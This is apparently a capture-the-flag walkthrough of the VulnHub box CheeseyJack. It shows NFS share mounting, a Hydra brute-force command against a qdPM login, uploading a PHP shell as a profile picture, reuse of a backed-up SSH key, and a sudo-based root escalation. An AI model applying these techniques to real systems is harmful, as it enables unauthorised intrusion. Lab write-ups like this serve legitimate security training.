Cheeseyjack aims to be an easy to medium level real-world-like box. Everything on this box is designed to make sense, and possibly teach you something.
Enumeration will be key when attacking this machine.
Hint: A cewl tool can help you get past a login page.

This is CHEESEY: CHEESEYJACK from vulnhub.


We have quite a few ports here:

  1. 22/tcp open ssh
  2. 80/tcp open http
  3. 111/tcp open rpcbind
  4. 139/tcp open netbios-ssn
  5. 445/tcp open microsoft-ds
  6. 2049/tcp open nfs
  7. 33060/tcp open mysqlx
  8. 33693/tcp open unknown
  9. 34577/tcp open unknown
  10. 38839/tcp open unknown
  11. 57011/tcp open unknown

So we’ve got SSH, HTTP, what looks like an NFS share, SMB and some other stuff. Let’s investigate.


No anonymous login; moving along …


We can mount the share:

root@kali:/opt/vulnhub/cheesey# mkdir mountpoint
root@kali:/opt/vulnhub/cheesey# mount -t nfs mountpoint
root@kali:/opt/vulnhub/cheesey# cd mountpoint/
root@kali:/opt/vulnhub/cheesey/mountpoint# ls -lash
total 12K
4.0K drwxr-xr-x 20 root root 4.0K Sep 24 19:23 .
4.0K drwxr-xr-x  5 root root 4.0K Oct 30 08:37 ..
4.0K drwxr-xr-x  4 root root 4.0K Sep 24 23:23 home
root@kali:/opt/vulnhub/cheesey/mountpoint# cd home
root@kali:/opt/vulnhub/cheesey/mountpoint/home# ls -lash
total 12K
4.0K drwxr-xr-x  4 root     root     4.0K Sep 24 23:23 .
4.0K drwxr-xr-x 20 root     root     4.0K Sep 24 19:23 ..
4.0K drwxr-xr-x 16 fsociety fsociety 4.0K Oct  9 06:27 ch33s3m4n

And we’ve got a /home directory belonging to ch33s3m4n.

In the /Downloads directory is a file called We can copy this to our local machine and extract the archive; it’s a set of files for a webapp called qdPM, presumably version 9.1. Checking searchsploit, we can see there are a number of exploits:

root@kali:/opt/vulnhub/cheesey# searchsploit qdpm
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload                                                                                                                                 | php/webapps/
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit)                                                                                                           | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting                                                                                                 | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection                                                                                                                           | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting                                                                                                             | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection                                                                                                             | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting                                                                                                                         | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload                                                                                                                               | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution                                                                                                                               | php/webapps/
qdPM < 9.1 - Remote Code Execution                                                                                                                             | multiple/webapps/
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Presumably this is our target.


Turning to the website, we can run a gobuster and turn up a couple of interesting things - /it_security, which contains a note:

Cheese you complete idiot. You hired me to ensure your webapp project stayed secure and you use a weak password like that? What’s wrong with you? A baby could guess that!

And /project_management, which has a login page for the qdPM 9.1 installation. The home page of the website is a countdown to launch type thing.

Now, the login wants an email address and password, presently we don’t have either of those things - or do we?

On the homepage there is a contact email address: info@cheeseyjack.local. So presumably that is the format we’re looking for. But who is the user? Entering the credentials:


returns a message:

Error: No match for Email and/or Password

So that’s not helpful. There is an option for Password forgotten which takes us to

Entering our ‘info’ address there gives this message:

Error: No records found

What if we use our username we found earlier, i.e. ch33s3m4n@cheeseyjack.local? Well, we get this message instead:

A new password has been sent to your e-mail address

So, we know this email address is valid, and is probably what we want. Unfortunately it does also seem to reset the password on the box! So now we’ve got to reset our VM. Whoops. Oh well, at least this isn’t a real machine.

Now, we got a hint about cewl and about a weak password, so we should listen to that. There aren’t actually many pages (/, /it_security, /project_management) so we can build a small-ish list. I tried running it with Hydra like so:

root@kali:/opt/vulnhub/cheesey# hydra http-form-post "/project_management/index.php/login:login%5B_csrf_token%5D=3649fdf0dc6d1c0870b97830e9296672&login%5Bemail%5D=^USER^&login%5Bpassword%5D=^PASS^&http_referer=:Error" -P ./cewl.list -l 'ch33s3m4n@cheeseyjack.local'

but it didn’t tell me when I found the right password. Burp Intruder does, but only by the length of the response - the correct password gives a longer response than incorrect ones, but it’s the same HTTP Status Code.

The password we end up using is qdpm, and we can log in.

One more thing

One more note about the website - if we refer to the file we downloaded from the NFS share earlier, we can see the directory structure of the qdpm installation. From that, we can find there is a directory (as an example) called /core/config, and if we go to then we can get a directory listing and access the files without being logged in.

With this we can find databases.yml which contains some credentials:


But ultimately this doesn’t help us because MYSQLX on port 33060 won’t accept connections from external IPs. Still, it’s worth noting.

qdPM Exploit

I grabbed one of the exploits from searchsploit and tried to run it as-is (it was a python script) but it didn’t seem to work. A quick flick through the code revealed it was very simple anyway - the concept was just setting a profile picture for the user account to some arbitrary PHP code. It’s literally as simple as using the webapp GUI to upload a PHP shell as the profile picture and then navigating to with a listener open and clicking on the uploaded shell. Easy peasy.

On the box

On the box we find a couple of potentially interesting users in crab and (of course) ch33s3m4n. We can look in crab’s home and find this:

www-data@cheeseyjack:/home/crab$ cat todo.txt
cat todo.txt
1. Scold cheese for weak qdpm password (done)
2. Backup SSH keys to /var/backups
3. Change cheeses weak password
4. Milk
5. Eggs
6. Stop putting my grocery list on my todo lists

Which leads us to this:

www-data@cheeseyjack:/var/backups/ssh-bak$ file key.bak
file key.bak
key.bak: OpenSSH private key

This is the SSH private key for crab. Copying it to our machine, we can chmod 600 it and SSH in as crab.

root@kali:/opt/vulnhub/cheesey# ssh -i id_rsa crab@ 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)

 * Documentation:
 * Management:
 * Support:


Once we’re in as crab, we find he can run things in his /.bin directory as root. So we can make ourselves a file and execute it.

crab@cheeseyjack:/dev/shm$ sudo -l
Matching Defaults entries for crab on cheeseyjack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User crab may run the following commands on cheeseyjack:
    (ALL : ALL) ALL
    (root) NOPASSWD: /home/crab/.bin/

So here we go:

crab@cheeseyjack:~$ cd .bin
crab@cheeseyjack:~/.bin$ nano test
crab@cheeseyjack:~/.bin$ chmod +x test 
crab@cheeseyjack:~/.bin$ sudo -u root /home/crab/.bin/test 
root@cheeseyjack:/home/crab/.bin# whoami

root@cheeseyjack:~# cat root.txt
**ASCII Art Removed**
WOWWEEEE! You rooted my box! Congratulations. If you enjoyed this box there will be more coming.

Tag me on twitter @cheesewadd with this picture and ill give you a RT!

In this instance test was just a bash script that started bash.